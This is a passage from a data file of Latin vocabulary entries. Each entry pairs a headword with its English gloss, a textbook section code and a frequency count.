'1_3', 3), ('TV', 40, 'tu', 'you', '', '1_3', 3), ('AGER', 41, 'ager', 'field', '', '1_3', 1), ('AMICVS/1', 42, 'amicus', 'friend', '', '1_3', 1), ('ANIMVS', 43, 'animus', 'spirit, soul, mind', '', '1_3', 1), ('CASA', 44, 'casa', 'little house, cottage', '', '1_3', 1), ('CVM/2', 45, 'cum', 'with (w/ abl.)', '', '1_3', 1), ('DEINDE', 46, 'deinde', 'then', '', '1_3', 1), ('DOMVS', 47, 'domus', 'home', '', '1_3', 2), ('FILIVS', 48, 'filius', 'son', '', '1_3', 1), ('IN', 49, 'in', 'in, on (w/ abl.); into, to, against (w/ acc.)', '', '1_3', 2), ('PVER', 50, 'puer', 'boy', '', '1_3', 1), ('RIVVS', 51, 'rivus', 'brook, stream', '', '1_3', 1), ('TIMEO', 52, 'timeo', 'to fear, to be afraid', '', '1_3', 1), ('VALDE', 53, 'valde', 'very, exceedingly', '', '1_3', 1), ('VIA', 54, 'via', 'road', '', '1_3', 1), ('VIR', 55, 'vir', 'man', '', '1_3', 1), ('IN', 56, 'in', 'in, on (w/ abl.); into, to, against (w/ acc.)', '', '1_4', 2), ('AD/2', 57, 'ad', 'into, towards, to (w/ acc.)', '', '1_4', 1), ('ARMATVS/2', 58, 'armatus', 'armed', '', '1_4', 1), ('AVTEM', 59, 'autem', 'however', '', '1_4', 1), ('BELLVM', 60, 'bellum', 'war', '', '1_4', 1), ('BONVS', 61, 'bonus', 'good', '', '1_4', 1), ('CASTRA/2', 62, 'castra', 'camp', '', '1_4', 1), ('DO', 63, 'do', 'to give', '', '1_4', 1), ('DOLVS', 64, 'dolus', 'trickery, deception', '', '1_4', 1), ('EX', 65, 'e', 'from, out of (w/ abl.)', '', '1_4', 1), ('INTRO/2', 66, 'intro', 'to enter', '', '1_4', 1), ('IVBEO', 67, 'iubeo', 'to order somebody (acc.) 
to do something (inf.)', '', '1_4', 1), ('IVSTVS', 68, 'iustus', 'legitimate, open, just', '', '1_4', 1), ('MAGNVS', 69, 'magnus', 'large, great, important', '', '1_4', 1), ('MALVS/3', 70, 'malus', 'bad', '', '1_4', 1), ('PRAECLARVS', 71, 'praeclarus', 'famous, distinguished', '', '1_4', 1), ('PRAEMIVM', 72, 'praemium', 'reward', '', '1_4', 1), ('ROMANVS/A', 73, 'Romanus', 'Roman; the Romans (pl.)', '', '1_4', 1), ('SED', 74, 'sed', 'but', '', '1_4', 1), ('VENENVM', 75, 'venenum', 'poison', '', '1_4', 1), ('VINCVLVM', 76, 'vinculum', 'chain, fetter', '', '1_4', 1), ('PARO/2', 77, 'paro', 'to prepare, get ready, design', '', '1_5', 2), ('AB', 78, 'a', 'by, from (w/ abl.)', '', '1_5', 1), ('AVXILIVM', 79, 'auxilium', 'help', '', '1_5', 1), ('COGITO', 80, 'cogito', 'to think', '', '1_5', 1), ('CONSILIVM', 81, 'consilium', 'plan, advice', '', '1_5', 2), ('DE', 82, 'de', 'about, concerning, down from (w/ abl.)', '', '1_5', 1), ('DOLEO', 83, 'doleo', 'to feel pain, to be hurt', '', '1_5', 1), ('EPISTOLA', 84, 'epistula', 'letter', '', '1_5', 1), ('FAMILIA', 85, 'familia', 'family, household', '', '1_5', 1), ('GAVDIVM', 86, 'gaudium', 'joy', '', '1_5', 1), ('LACRIMA', 87, 'lacrima', 'tear', '', '1_5', 1), ('LONGE', 88, 'longe', 'far', '', '1_5', 1), ('LONGVS', 89, 'longus', 'long', '', '1_5', 1), ('MISER', 90, 'miser', 'wretched, sad, miserable', '', '1_5', 1), ('NAM', 91, 'nam', 'for, in fact', '', '1_5', 1), ('NONSOLVM', 92, 'non', 'not only…, but also…', '', '1_5', 1), ('PVLCHER', 93, 'pulcher', 'beautiful, nice', '', '1_5', 1), ('SEMPER', 94, 'semper', 'always', '', '1_5', 1), ('TAMEN', 95, 'tamen', 'however', '', '1_5', 2), ('SVM/1', 96, 'sum', 'to be', '', '1_6', 3), ('DOCEO', 97, 'doceo', 'to teach', '', '1_6', 1), ('DVM/2', 98, 'dum', 'while', '', '1_6', 1), ('EXEMPLVM', 99, 'exemplum', 'example', '', '1_6', 1), ('FIRMO', 100, 'firmo', 'to strengthen', '', '1_6', 1), ('IACEO', 101, 'iaceo', 'to lie down, to be inert', '', '1_6', 1), ('IVDICO', 102, 'iudico', 'to 
judge', '', '1_6', 1), ('LIBER/1', 103, 'liber', 'book', '', '1_6', 1), ('LITTERA', 104, 'littera', 'letter of the alphabet (sing.); literature, letter (pl.)', '', '1_6', 1), ('MANEO', 105, 'maneo', 'to remain', '', '1_6', 1), ('MEMORIA', 106, 'memoria', 'memory', '', '1_6', 1), ('MVLTVS', 107, 'multus', 'much, many', '', '1_6', 1), ('POSSVM/1', 108, 'possum', 'to be able, can', '', '1_6', 1), ('PROPTER/2', 109, 'propter', 'because of, on account of (w/ acc.)', '', '1_6', 1), ('SAEPE', 110, 'saepe', 'often', '', '1_6', 1), ('SERVO', 111, 'servo', 'to save, preserve', '', '1_6', 1), ('SOLEO', 112, 'soleo', 'to be accustomed (w/ inf.)', '', '1_6', 1), ('TENEBRAE', 113, 'tenebrae', 'shadows, darkness (pl.)', '', '1_6', 1), ('VITA', 114, 'vita', 'life', '', '1_6', 1), ('AESTIMO', 115, 'aestimo', 'to regard, esteem', '', '1_7', 1), ('AESTIMOVNIVSASSIS', 116, 'aestimo', 'I do not care a bit ', '', '1_7', 1), ('AMOR', 117, 'amor', 'love', '', '1_7', 1), ('DELICIA/1', 118, 'delicia', 'delight, pet', '', '1_7', 1), ('DIGITVS', 119, 'digitus', 'finger', '', '1_7', 1), ('DOMINA', 120, 'domina', 'mistress', '', '1_7', 1), ('GREMIVM', 121, 'gremium', 'lap', '', '1_7', 1), ('INVIDEO', 122, 'invideo', 'to envy', '', '1_7', 1), ('MEVS', 123, 'meus', 'my', '', '1_7', 1), ('OCVLVS', 124, 'oculus', 'eye', '', '1_7', 1), ('PASSER', 125, 'passer', 'sparrow', '', '1_7', 1), ('PAX', 126, 'pax', 'peace; favor', '', '1_7', 1), ('PVTO', 127, 'puto', 'to think', '', '1_7', 1), ('SENEX/1', 128, 'senex', 'old man', '', '1_7', 1), ('SESESE', 129, 'se', 'him/her/itself', '', '1_7', 1), ('SEVERVS', 130, 'severus', 'serious', '', '1_7', 1), ('SOROR', 131, 'soror', 'sister', '', '1_7', 1), ('SVI/1', 132, 'sui', 'him–/her–/itself', '', '1_7', 1), ('VERBVM', 133, 'verbum', 'word', '', '1_7', 1), ('CONTRA/2', 134, 'contra', 'against (w/ acc.)', '', '1_8', 1), ('DECERNO', 135, 'decerno', 'to decide, determine (often w/ inf.)', '', '1_8', 1), ('DICO/2', 136, 'dico', 'to say', '', '1_8', 1), ('DVX', 137, 
'dux', 'leader, general', '', '1_8', 1), ('FORTITVDO', 138, 'fortitudo', 'courage', '', '1_8', 1), ('HOMO', 139, 'homo', 'man, human being; people (pl.)', '', '1_8', 1), ('INTELLIGO', 140, 'intellego', 'to understand', '', '1_8', 1), ('LIBERO', 141, 'libero', 'to free someone (acc.) from something (abl.)', '', '1_8', 1), ('MILES', 142, 'miles', 'soldier', '', '1_8', 1), ('NAVIGO', 143, 'navigo', 'to sail, navigate', '', '1_8', 1), ('ORACVLVM', 144, 'oraculum', 'oracle, prophecy', '', '1_8', 1), ('PETO', 145, 'peto', 'to seek', '', '1_8', 1), ('REX', 146, 'rex', 'king', '', '1_8', 1), ('TANDEM', 147, 'tandem', 'finally', '', '1_8', 1), ('TEMPLVM', 148, 'templum', 'temple', '', '1_8', 1), ('TIMOR', 149, 'timor', 'fear', '', '1_8', 1), ('TVM', 150, 'tum', 'then, at that time', '', '1_8', 2), ('VINCO', 151, 'vinco', 'to conquer', '', '1_8', 1), ('ANIMAL', 152, 'animal', 'animal', '', '1_9', 1), ('ARMA', 153, 'arma', 'weapons (pl.)', '', '1_9', 1), ('AVDIO', 154, 'audio', 'to hear, listen', '', '1_9', 1), ('CAPVT', 155, 'caput', 'head', '', '1_9', 1), ('CIVIS', 156, 'civis', 'citizen', '', '1_9', 1), ('CONSVL', 157, 'consul', 'consul', '', '1_9', 1), ('CORPVS', 158, 'corpus', 'body', '', '1_9', 1), ('CREDO', 159, 'credo', 'to believe somebody (w/ dat.)', '', '1_9', 1), ('EXEMPLAR', 160, 'exemplar', 'example', '', '1_9', 1), ('GERO', 161, 'gero', 'to carry; to behave (w/ se)', '', '1_9', 2), ('MARE', 162, 'mare', 'sea', '', '1_9', 1), ('MORS', 163, 'mors', 'death', '', '1_9', 1), ('MVLIER', 164, 'mulier', 'woman', '', '1_9', 1), ('ORATIO', 165, 'oratio', 'oration, speech', '', '1_9', 1), ('SCIO', 166, 'scio', 'to know', '', '1_9', 1), ('SENTIO', 167, 'sentio', 'to perceive', '', '1_9', 1), ('TEMPVS/1', 168, 'tempus', 'time', '', '1_9', 1), ('VENIO', 169, 'venio', 'to come', '', '1_9', 1), ('VRBS', 170, 'urbs', 'city', '', '1_9', 1), ('ACER/2', 171, 'acer', 'keen, fierce', '', '1_10', 1), ('AEDIFICO', 172, 'aedifico', 'to build', '', '1_10', 1), ('CAPIO/2', 173, 'capio', 
'to take, adopt, capture', '', '1_10', 1), ('CELEBER', 174, 'celeber', 'renowned, well–known, crowded', '', '1_10', 1), ('CVPIO', 175, 'cupio', 'to desire, want', '', '1_10', 1), ('DELEO', 176, 'deleo', 'to destroy', '', '1_10', 1), ('DEVS', 177, 'deus', 'god', '', '1_10', 1), ('DONVM', 178, 'donum', 'gift', '', '1_10', 1), ('EQVVS', 179, 'equus', 'horse', '', '1_10', 1), ('FELIX', 180, 'felix', 'fortunate, happy', '', '1_10', 1), ('FLAMMA', 181, 'flamma', 'flame', '', '1_10', 1), ('FORTIS', 182, 'fortis', 'brave, strong', '', '1_10', 1), ('FVGIO', 183, 'fugio', 'to flee, run away', '', '1_10', 1), ('HOSTIS', 184, 'hostis', 'enemy', '', '1_10', 1), ('MOVEO', 185, 'moveo', 'to move', '', '1_10', 1), ('NEC/2', 186, 'nec', 'nor; and not', '', '1_10', 2), ('NOX', 187, 'nox', 'night', '', '1_10', 1), ('PAVCI', 188, 'paucus', 'few', '', '1_10', 1), ('PERICVLVM', 189, 'periculum', 'danger', '', '1_10', 1), ('PVGNO', 190, 'pugno', 'to fight', '', '1_10', 1), ('AGO', 191, 'ago', 'to drive, lead, do, behave', '', '1_11', 1), ('ARDEO', 192, 'ardeo', 'to burn, be on fire', '', '1_11', 1), ('CONSPICIO', 193, 'conspicio', 'to look at, observe', '', '1_11', 1), ('CRVDELIS', 194, 'crudelis', 'cruel', '', '1_11', 1), ('DOLOR', 195, 'dolor', 'grief, pain', '', '1_11', 1), ('ITA', 196, 'ita', 'yes', '', '1_11', 2), ('MINIME', 197, 'minime', 'No', '', '1_11', 1), ('MITTO', 198, 'mitto', 'to send', '', '1_11', 1), ('NE/2', 199, 'ne', '(added to the first word of a question', '', '1_11', 1), ('NOVVS', 200, 'novus', 'new', '', '1_11', 1), ('PARVM/2', 201, 'parum', 'too little', '', '1_11', 2), ('QVE', 202, 'que', 'and', '', '1_11', 1), ('QVOQVE', 203, 'quoque', 'also', '', '1_11', 1), ('REGINA', 204, 'regina', 'queen', '', '1_11', 1), ('RELINQVO', 205, 'relinquo', 'to abandon', '', '1_11', 1), ('SILVA', 206, 'silva', 'forest', '', '1_11', 1), ('SPELVNCA', 207, 'spelunca', 'cave', '', '1_11', 1), ('TEMPESTAS', 208, 'tempestas', 'season', '', '1_11', 1), ('VNA', 209, 'una', 'together', '', 
'1_11', 1), ('BELLVMGERO', 210, 'bellum', 'to wage war', '', '1_12', 1), ('CONSVMO', 211, 'consumo', 'to consume', '', '1_12', 1), ('DEXTERA', 212, 'dextera', 'right hand', '', '1_12', 1), ('FACIO', 213, 'facio', 'to do, make', '', '1_12', 1), ('IBI', 214, 'ibi', 'there', '', '1_12', 1), ('IGNIS', 215, 'ignis', 'fire', '', '1_12', 1), ('INQVIO', 216, 'inquam', 'to say (used with direct speech)', '', '1_12', 3), ('IRA', 217, 'ira', 'anger', '', '1_12', 1), ('IS', 218, 'is', 's/he/it, this, that', '', '1_12', 1), ('NOMEN', 219, 'nomen', 'name', '', '1_12', 1), ('NOS', 220, 'nos', 'we; us', '', '1_12', 1), ('NOSTER', 221, 'noster', 'our, ours', '', '1_12', 1), ('OCCIDO/2', 222, 'occido', 'to strike down, knock down', '', '1_12', 1), ('OSTENDO', 223, 'ostendo', 'to show', '', '1_12', 1), ('PONO', 224, 'pono', 'to place', '', '1_12', 1), ('PROPE/2', 225, 'prope', 'near', '', '1_12', 2), ('PROVIRIBVS', 226, 'pro', 'with all one’s might', '', '1_12', 1), ('SIMILIS', 227, 'similis', 'similar', '', '1_12', 1), ('STATIM', 228, 'statim', 'immediately', '', '1_12', 1), ('TANTVS', 229, 'tantus', 'so much', '', '1_12', 1), ('TVVS', 230, 'tuus', 'your', '', '1_12', 1), ('VESTER', 231, 'vester', 'your', '', '1_12', 1), ('VIS', 232, 'vis', 'force', '', '1_12', 1), ('VOS', 233, 'vos', 'you', '', '1_12', 1), ('EGO', 234, 'ego', 'I', '', '1_13', 3), ('TV', 235, 'tu', 'you', '', '1_13', 3), ('TVM', 236, 'tum', 'then, at that time', '', '1_13', 2), ('ALIVS', 237, 'alius', 'another, other', '', '1_13', 1), ('APVD', 238, 'apud', 'at the house of (w/ acc.)', '', '1_13', 1), ('ATQVE/1', 239, 'atque', 'as', '', '1_13', 2), ('DISCEDO/1', 240, 'discedo', 'to leave, withdraw, go away', '', '1_13', 1), ('DIVES', 241, 'dives', 'rich', '', '1_13', 1), ('DOCTVS', 242, 'doctus', 'learned', '', '1_13', 1), ('DVCO', 243, 'duco', 'to lead, take', '', '1_13', 2), ('ENIM/2', 244, 'enim', 'for, in fact', '', '1_13', 1), ('IVDEX', 245, 'iudex', 'judge', '', '1_13', 1), ('LICET/1', 246, 'licet', 'it is 
allowed, permitted (for someone)(to do something)(w/ dat. and inf.) ', '', '1_13', 1), ('NIHIL', 247, 'nihil', 'nothing', '', '1_13', 1), ('NOLO', 248, 'nolo', 'not to want, to be unwilling', '', '1_13', 2), ('OMNIS', 249, 'omnis', 'each, every, all', '', '1_13', 1), ('PRO/1', 250, 'pro', 'for, on behalf of (w/ abl.)', '', '1_13', 1), ('QVID', 251, 'quid', 'what; why', '', '1_13', 1), ('RESPONDEO', 252, 'respondeo', 'to answer', '', '1_13', 1), ('ROGO', 253, 'rogo', 'to ask', '', '1_13', 1), ('SVVS', 254, 'suus', 'his, her, its, their', '', '1_13', 2), ('TANTVM/2', 255, 'tantum', 'only', '', '1_13', 1), ('VALE', 256, 'vale', 'to greetings! farewell!', '', '1_13', 1), ('VALEO', 257, 'valeo', 'to be able (w/ inf.); to be in good health', '', '1_13', 3), ('ALBVS', 258, 'albus', 'white', '', '1_14', 1), ('ARBOR', 259, 'arbor', 'tree', '', '1_14', 1), ('CADO', 260, 'cado', 'to fall', '', '1_14', 1), ('COMEDO/2', 261, 'comedo', 'to eat', '', '1_14', 1), ('CONVENIO', 262, 'convenio', 'to meet', '', '1_14', 1), ('FLVO', 263, 'fluo', 'to flow', '', '1_14', 1), ('GLADIVS', 264, 'gladius', 'sword', '', '1_14', 1), ('IAM', 265, 'iam', 'already, yet', '', '1_14', 1), ('MOX', 266, 'mox', 'soon', '', '1_14', 1), ('ODIVM', 267, 'odium', 'hatred', '', '1_14', 2), ('OS/1', 268, 'os', 'mouth', '', '1_14', 1), ('PARENS/1', 269, 'parens', 'parent', '', '1_14', 1), ('PECTVS', 270, 'pectus', 'chest', '', '1_14', 1), ('PER', 271, 'per', 'through (w/ acc.)', '', '1_14', 1), ('PRIMVS', 272, 'primus', 'first', '', '1_14', 1), ('QVI/1', 273, 'qui', 'who, which (rel. pronoun); what? which? (inter. adj.) ', '', '1_14', 2), ('RVBER', 274, 'ruber', 'red', '', '1_14', 1), ('SANGVIS', 275, 'sanguis', 'blood', '', '1_14', 1), ('SEPARO/2', 276, 'separo', 'to separate, divide', '', '1_14', 1), ('TANGO', 277, 'tango', 'to touch', '', '1_14', 1), ('INQVIO', 278, 'inquam', 'to say (used with direct speech)', '', '1_15', 3), ('QVI/1', 279, 'qui', 'who, which (rel. pronoun); what? which? (inter. adj.) 
', '', '1_15', 2), ('ANTE/2', 280, 'ante', 'in front of (w/ acc.)', '', '1_15', 1), ('ARGVMENTVM', 281, 'argumentum', 'proof, indication, argument', '', '1_15', 1), ('CVR/1', 282, 'cur', 'why', '', '1_15', 1), ('DIFFICILIS', 283, 'difficilis', 'difficult', '', '1_15', 1), ('ECCE', 284, 'ecce', 'look here!', '', '1_15', 1), ('ETIAM', 285, 'etiam', 'even, also', '', '1_15', 1), ('FORSITAN', 286, 'forsan', 'perhaps', '', '1_15', 1), ('NEGLIGO', 287, 'neglego', 'to neglect', '', '1_15', 1), ('PARVVS/2', 288, 'parvus', 'small', '', '1_15', 1), ('QVIS/1', 289, 'quis', 'who? which? (inter. pronoun)', '', '1_15', 1), ('RVSTICVS/2', 290, 'rusticus', 'rural, rustic', '', '1_15', 1), ('SAXVM', 291, 'saxum', 'stone, rock', '', '1_15', 1), ('SENECTVS/1', 292, 'senectus', 'old age', '', '1_15', 1), ('SICVT/1', 293, 'sicut', 'just as', '', '1_15', 1), ('STO', 294, 'sto', 'stand', '', '1_15', 1), ('VBIQVE', 295, 'ubique', 'everywhere', '', '1_15', 1), ('VERVS', 296, 'verus', 'real, true', '', '1_15', 1), ('VETVSTVS', 297, 'vetustus', 'old', '', '1_15', 1), ('VILLA', 298, 'villa', 'estate', '', '1_15', 1), ('VMQVAM', 299, 'umquam', 'ever', '', '1_15', 1), ('AVVNCVLVS', 300, 'avunculus', 'uncle', '', '1_16', 1), ('CAELVM/1', 301, 'caelum', 'sky, heaven, weather', '', '1_16', 1), ('CAVSA', 302, 'causa', 'cause, reason', '', '1_16', 1), ('CINIS', 303, 'cinis', 'ash', '', '1_16', 1), ('CLADES', 304, 'clades', 'disaster', '', '1_16', 1), ('CLASSIS', 305, 'classis', 'fleet, class (of people)', '', '1_16', 1), ('FEMINA', 306, 'femina', 'woman', '', '1_16', 1), ('FVMVS', 307, 'fumus', 'smoke', '', '1_16', 1), ('FVNESTVS', 308, 'funestus', 'deadly', '', '1_16', 1), ('IGITVR', 309, 'igitur', 'therefore', '', '1_16', 1), ('INCENDIVM', 310, 'incendium', 'conflagration, eruption', '', '1_16', 1), ('LEGO/2', 311, 'lego', 'to read, choose', '', '1_16', 1), ('LITVS/2', 312, 'litus', 'shore', '', '1_16', 1), ('MATER', 313, 'mater', 'mother', '', '1_16', 1), ('MONS', 314, 'mons', 'mountain', '', 
'1_16', 1), ('NAVIS', 315, 'navis', 'ship', '', '1_16', 1), ('NVBES', 316, 'nubes', 'cloud', '', '1_16', 1), ('NVMQVAM', 317, 'numquam', 'never', '', '1_16', 1), ('OPPRIMO', 318, 'opprimo', 'to overwhelm, suppress', '', '1_16', 1), ('PARS', 319, 'pars', 'part', '', '1_16', 1), ('STVDEO', 320, 'studeo', 'to study, be eager for, be interested in (w/ dat.)', '', '1_16', 1), ('DOMVS', 321, 'domus', 'home', '', '1_17', 2), ('ALO', 322, 'alo', 'to feed, nourish', '', '1_17', 1), ('AMITTO', 323, 'amitto', 'to lose', '', '1_17', 1), ('CORNV', 324, 'cornu', 'horn', '', '1_17', 1), ('CORRIPIO', 325, 'corripio', 'to seize, occupy, engulf', '', '1_17', 1), ('CVRRO', 326, 'curro', 'to run', '', '1_17', 1), ('DEVASTO', 327, 'devasto', 'to lay waste', '', '1_17', 1), ('EXSTINGVO', 328, 'exstinguo', 'to extinguish', '', '1_17', 1), ('FACILE', 329, 'facile', 'easliy', '', '1_17', 1), ('IACIO', 330, 'iacio', 'to throw', '', '1_17', 1), ('IMPERATOR', 331, 'imperator', 'general, emperor', '', '1_17', 1), ('IMPETVS', 332, 'impetus', 'impetus, force, attack', '', '1_17', 1), ('INITIVM', 333, 'initium', 'beginning', '', '1_17', 1), ('IVSSVS', 334, 'iussus', 'order', '', '1_17', 1), ('LOCVS', 335, 'locus', 'place (sing.); passages of a book (m. pl.); geographical places(n. 
pl.)', '', '1_17', 1), ('MANVS/1', 336, 'manus', 'hand', '', '1_17', 1), ('MVRVS', 337, 'murus', 'wall', '', '1_17', 1), ('SINE', 338, 'sine', 'without (w/ abl.)', '', '1_17', 1), ('TEMPTO', 339, 'tempto', 'to try', '', '1_17', 1), ('TVMVLTVS', 340, 'tumultus', 'confusion', '', '1_17', 1), ('VENTVS', 341, 'ventus', 'wind', '', '1_17', 1), ('DVCO', 342, 'duco', 'to lead, take', '', '1_18', 2), ('ITA', 343, 'ita', 'yes', '', '1_18', 2), ('COLO/2', 344, 'colo', 'to worship, cultivate', '', '1_18', 1), ('CVM/3', 345, 'cum', 'when, after', '', '1_18', 2), ('DEA', 346, 'dea', 'goddess', '', '1_18', 1), ('DIES', 347, 'dies', 'day', '', '1_18', 1), ('DORMIO', 348, 'dormio', 'to sleep', '', '1_18', 1), ('EXCITO/1', 349, 'excito', 'to awaken, rouse, stir up', '', '1_18', 1), ('EXCLAMO', 350, 'exclamo', 'to exclaim', '', '1_18', 1), ('FACIES', 351, 'facies', 'face', '', '1_18', 1), ('FATVM', 352, 'fatum', 'fate, destiny', '', '1_18', 1), ('MARITVS/1', 353, 'maritus', 'husband', '', '1_18', 1), ('MERIDIES', 354, 'meridies', 'midday', '', '1_18', 2), ('MVLTVM/2', 355, 'multum', 'much', '', '1_18', 1), ('OCCVLTO', 356, 'occulto', 'to hide', '', '1_18', 1), ('PATER', 357, 'pater', 'father', '', '1_18', 2), ('POST/2', 358, 'post', 'after (w/ acc.)', '', '1_18', 1), ('QVAERO', 359, 'quaero', 'to look for, search', '', '1_18', 1), ('RES', 360, 'res', 'thing, matter', '', '1_18', 1), ('SI/2', 361, 'si', 'if', '', '1_18', 1), ('SOMNVS', 362, 'somnus', 'sleep', '', '1_18', 1), ('TAM', 363, 'tam', 'so ', '', '1_18', 1), ('VXOR', 364, 'uxor', 'wife', '', '1_18', 2), ('BARBA', 365, 'barba', 'beard', '', '1_19', 1), ('CARO/1', 366, 'caro', 'meat, flesh', '', '1_19', 1), ('CELERITER', 367, 'celeriter', 'swiftly', '', '1_19', 1), ('COQVO', 368, 'coquo', 'to cook', '', '1_19', 1), ('CRESCO', 369, 'cresco', 'to grow', '', '1_19', 1), ('FEROX', 370, 'ferox', 'fierce, ferocious', '', '1_19', 1), ('FORIS/2', 371, 'foris', 'outside, in the open', '', '1_19', 1), ('HERBA', 372, 'herba', 'plant, 
vegetation', '', '1_19', 1), ('HIC/1', 373, 'hic', 'this', '', '1_19', 1), ('INTER', 374, 'inter', 'between, among (w/ acc.)', '', '1_19', 1), ('PELLIS', 375, 'pellis', 'skin, hide', '', '1_19', 1), ('POSTQVAM', 376, 'postquam', 'after', '', '1_19', 1), ('PROELIVM', 377, 'proelium', 'battle, combat', '', '1_19', 1), ('SANO', 378, 'sano', 'to heal', '', '1_19', 1), ('SEDEO', 379, 'sedeo', 'to sit', '', '1_19', 1), ('TERO', 380, 'tero', 'to wear out, rub', '', '1_19', 1), ('TERRIBILIS', 381, 'terribilis', 'terrifying', '', '1_19', 1), ('VESTIMENTVM', 382, 'vestimentum', 'garment, clothes (pl.)', '', '1_19', 1), ('VIVO', 383, 'vivo', 'to live', '', '1_19', 1), ('VVLNERO', 384, 'vulnero', 'to wound', '', '1_19', 1), ('VVLNVS', 385, 'vulnus', 'wound', '', '1_19', 1), ('ABVNDO', 386, 'abundo', 'to abound with (w/ abl.)', '', '1_20', 1), ('ADOLESCENS/2', 387, 'adulescens', 'young man, young lady', '', '1_20', 1), ('AEQVVS', 388, 'aequus', 'even', '', '1_20', 1), ('COR', 389, 'cor', 'heart', '', '1_20', 1), ('DELECTO', 390, 'delecto', 'to delight, please', '', '1_20', 1), ('DIVINVS/2', 391, 'divinus', 'divine', '', '1_20', 1), ('EGEO', 392, 'egeo', 'to lack something (abl.)', '', '1_20', 1), ('FVR', 393, 'fur', 'thief', '', '1_20', 1), ('FVRTVM', 394, 'furtum', 'theft', '', '1_20', 1), ('HVMANVS', 395, 'humanus', 'human', '', '1_20', 1), ('ILLE', 396, 'ille', 'that', '', '1_20', 1), ('INIQVITAS', 397, 'iniquitas', 'injustice', '', '1_20', 1), ('LEX', 398, 'lex', 'law', '', '1_20', 1), ('LVDO', 399, 'ludo', 'to play', '', '1_20', 1), ('NOCTV', 400, 'noctu', 'during the night', '', '1_20', 1), ('PAENE', 401, 'paene', 'almost', '', '1_20', 1), ('PAVPER', 402, 'pauper', 'poor', '', '1_20', 1), ('PLENVS', 403, 'plenus', 'full of (w/ gen. 
or abl.)', '', '1_20', 1), ('POMVM', 404, 'pomum', 'fruit', '', '1_20', 1), ('PVNIO', 405, 'punio', 'to punish', '', '1_20', 1), ('ACCIPIO', 406, 'accipio', 'to accept, receive', '', '1_21', 1), ('ACCVSO', 407, 'accuso', 'to accuse someone (acc.) of something (gen.)', '', '1_21', 1), ('ALIENVS/2', 408, 'alienus', 'foreign to, inconsistent with (w/ a/ab and abl.)', '', '1_21', 1), ('AXIS', 409, 'axis', 'axle, axis', '', '1_21', 1), ('CIRCVM/2', 410, 'circum', 'around (w/ acc.)', '', '1_21', 1), ('CONSTANTIA', 411, 'constantia', 'constancy', '', '1_21', 1), ('DESCENDO', 412, 'descendo', 'to descend', '', '1_21', 1), ('DIVITIAE', 413, 'divitia', 'wealth, riches (pl.)', '', '1_21', 1), ('ERIPIO', 414, 'eripio', 'to snatch away', '', '1_21', 1), ('ERRO/2', 415, 'erro', 'to wander, make a mistake', '', '1_21', 1), ('EXTERNVS', 416, 'externus', 'outward, external', '', '1_21', 1), ('FORTVNA', 417, 'fortuna', 'fortune, the goddess Fortune', '', '1_21', 1), ('FVTVRVS', 418, 'futurus', 'about to be (from sum)', '', '1_21', 1), ('HONOR', 419, 'honor', 'honor, public office or distinction', '', '1_21', 1), ('MVTO/2', 420, 'muto', 'to change', '', '1_21', 1), ('POSSIDEO', 421, 'possideo', 'to possess', '', '1_21', 1), ('PROCERTO', 422, 'pro', 'for certain, for sure', '', '1_21', 1), ('RECIPIO', 423, 'recipio', 'to take back', '', '1_21', 2), ('REPREHENDO', 424, 'reprehendo', 'to blame, rebuke', '', '1_21', 1), ('ROTA', 425, 'rota', 'wheel', '', '1_21', 1), ('TOLLO', 426, 'tollo', 'to lift up, raise; to destroy', '', '1_21', 1), ('VERSO', 427, 'verso', 'to turn', '', '1_21', 1), ('VLLVS', 428, 'ullus', 'any', '', '1_21', 1), ('CONSILIVM', 429, 'consilium', 'plan, advice', '', '2_1', 2), ('MERIDIES', 430, 'meridies', 'midday', '', '2_1', 2), ('PROPE/2', 431, 'prope', 'near', '', '2_1', 2), ('ASPICIO', 432, 'aspicio', 'to look at, catch a glimpse of', '', '2_1', 1), ('ETET', 433, 'et', 'both…and…', '', '2_1', 1), ('GENS', 434, 'gens', 'tribe, population', '', '2_1', 1), ('GIGNO', 
435, 'gigno', 'to give birth, produce', '', '2_1', 1), ('HODIE', 436, 'hodie', 'today', '', '2_1', 1), ('INCOLA', 437, 'incola', 'inhabitant', '', '2_1', 1), ('INSVLA', 438, 'insula', 'island', '', '2_1', 2), ('INVENIO', 439, 'invenio', 'to come upon, find', '', '2_1', 1), ('MOS', 440, 'mos', 'custom, habit; morals (pl.)', '', '2_1', 1), ('MVNDVS/1', 441, 'mundus', 'world', '', '2_1', 1), ('NE/4', 442, 'ne', 'that not, not to, lest ', '', '2_1', 3), ('OCCVPO/2', 443, 'occupo', 'to occupy', '', '2_1', 1), ('ORTVS', 444, 'ortus', 'origin, beginning, raising', '', '2_1', 1), ('PISCIS', 445, 'piscis', 'a fish', '', '2_1', 1), ('PROCVL', 446, 'procul', 'far, far away', '', '2_1', 1), ('PROMITTO', 447, 'promitto', 'to promise', '', '2_1', 1), ('SEPTENTRIONALIS', 448, 'septentrionalis', 'northern', '', '2_1', 1), ('SITVS/2', 449, 'situs', 'located, situated', '', '2_1', 1), ('SOL', 450, 'sol', 'sun', '', '2_1', 1), ('VTINAM', 451, 'utinam', 'if only', '', '2_1', 2), ('GERO', 452, 'gero', 'to carry; to behave (w/ se)', '', '2_2', 2), ('ODIVM', 453, 'odium', 'hatred', '', '2_2', 2), ('VALEO', 454, 'valeo', 'to be able (w/ inf.); to be in good health', '', '2_2', 3), ('ALTVS', 455, 'altus', 'tall, deep', '', '2_2', 1), ('ANNVS', 456, 'annus', 'year', '', '2_2', 1), ('ARGENTVM', 457, 'argentum', 'silver', '', '2_2', 1), ('AVRVM', 458, 'aurum', 'gold', '', '2_2', 1), ('BREVIS', 459, 'brevis', 'short', '', '2_2', 1), ('CLARVS', 460, 'clarus', 'clear, distinguished', '', '2_2', 1), ('CVSTOS', 461, 'custos', 'guard', '', '2_2', 1), ('EQVES', 462, 'eques', 'horseman', '', '2_2', 1), ('FINIS', 463, 'finis', 'end', '', '2_2', 1), ('GRAVIS', 464, 'gravis', 'serious, heavy', '', '2_2', 1), ('INTERDVM', 465, 'interdum', 'sometimes', '', '2_2', 1), ('LIS', 466, 'lis', 'dispute, quarrel', '', '2_2', 1), ('MANE/2', 467, 'mane', 'in the morning', '', '2_2', 1), ('ODIOHABEO', 468, 'odio', 'to hate somebody', '', '2_2', 1), ('SINO', 469, 'sino', 'to allow somebody (acc.) 
